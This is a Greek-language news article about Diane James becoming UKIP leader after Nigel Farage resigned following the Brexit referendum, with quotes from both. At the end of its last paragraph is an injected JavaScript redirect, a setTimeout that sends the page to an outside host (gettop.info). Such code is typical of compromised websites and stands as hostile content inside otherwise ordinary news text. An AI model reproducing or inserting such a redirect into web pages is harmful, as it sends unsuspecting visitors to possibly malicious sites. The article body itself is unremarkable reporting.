Εξελέγη γυναίκα στην ηγεσία του Ukip – Προειδοποιεί ότι δεν θα είναι «Νάιτζελ light»

0
5

 

Η Βρετανίδα ευρωβουλευτής Νταϊάν Τζέιμς και μέχρι σήμερα αντιπρόεδρος του ξενοφοβικού ευρωσκεπτικιστικού κόμματος Ukip της Βρετανίας, εξελέγη στην ηγεσία του, μετά την παραίτηση του Νάιτζελ Φάρατζ.

Η 56χρονη Τζέιμς είναι η πρώτη γυναίκα που αναλαμβάνει τα ηνία του Ukip, το οποίο ιδρύθηκε το 1993. Ο Φάρατζ παραιτήθηκε λίγες ημέρες μετά το δημοψήφισμα της 23ης Ιουνίου, στο οποίο οι Βρετανοί τάχθηκαν υπέρ της αποχώρησης της χώρας τους από την Ευρωπαϊκή Ένωση.

Η νίκη της Τζέιμς στις εσωκομματικές εκλογές, όπου ψήφισαν περίπου 40.000 μέλη του κόμματος, ανακοινώθηκε στο συνέδριο του Ukip που διεξάγεται στο Μπόρνμαουθ, στη νότια Αγγλία.
Η ίδια, μετά την εκλογή της δήλωσε ότι δεν πρόκειται να είναι «Νάιτζελ λάιτ»

Ο ίδιος ο Φάρατζ, στην τελευταία ομιλία του ως ηγέτης του κόμματος, κάλεσε τη διάδοχό του να ασκήσει πιέσεις για να πετύχει μια «σκληρή» έξοδο από την ΕΕ που θα ανταποκρίνεται στις προσδοκίες των ψηφοφόρων του Ukip. Όπως είπε, το κόμμα που διαδραμάτισε καθοριστικό ρόλο στο αποτέλεσμα του δημοψηφίσματος, «άλλαξε το κέντρο βαρύτητας» της βρετανικής πολιτικής.

«Μπορούμε να είμαστε πολύ υπερήφανοι γιατί κερδίσαμε τον πόλεμο όμως τώρα πρέπει να κερδίσουμε την ειρήνη. Ο μοναδικός μηχανισμός που υπάρχει για να ασκηθεί πίεση στην κυβέρνηση (…) ώστε να διασφαλίσουμε ότι αυτά τα 17,4 εκατομμύρια άνθρωποι (που ψήφισαν υπέρ του Brexit) θα λάβουν αυτό για το οποίο ψήφισαν, είναι να παραμείνει το Ukip υγιές και ισχυρό«, τόνισε.

Πολιτικοί αναλυτές σχολιάζουν πάντως ότι το Ukip έχει ταυτιστεί τόσο πολύ με τον Φάρατζ, ο οποίος ήταν αρχηγός του μεταξύ 2006-9 και 2010-16, που η αποχώρησή του αφήνει ένα τεράστιο, δυσαναπλήρωτο κενό. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here